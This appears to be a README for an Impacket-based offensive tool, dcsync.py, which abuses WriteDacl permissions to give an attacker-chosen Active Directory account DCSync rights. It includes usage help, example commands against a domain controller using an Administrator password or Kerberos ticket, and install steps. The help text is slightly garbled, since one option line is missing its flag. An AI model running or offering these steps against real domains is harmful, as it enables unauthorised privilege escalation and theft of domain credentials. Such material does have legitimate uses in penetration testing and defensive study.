DCSync - DCSync Attack from Outside using Impacket


Adding DCSync Permissions

Mostly copypasta from https://github.com/tothi/rbcd-attack

usage: dcsync.py [-h] -dc FQDN -t USERNAME [-hashes LMHASH:NTHASH] [-k] identity

WriteDacl Attack: To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges.

positional arguments:
  identity              domain\username:password, attacker account with write access to target computer properties (NetBIOS domain name must be used!)

optional arguments:
  -h, --help            show this help message and exit
  -dc FQDN              FQDN of the Domain Controller
  -t USERNAME           Target user to be escalated
                        Hash for LDAP auth (instead of password)
  -k                    If you want to use a Kerberos ticket

Example: ./dcsync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local'  n00py\Administrator:Password123

Example: ./dcsync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local'  n00py\Administrator -k

Warning: This toold does not contain a cleanup function (yet?)



apt install heimdal-dev -y
apt install libkrb5-dev -y
python3 -m pip install gssapi
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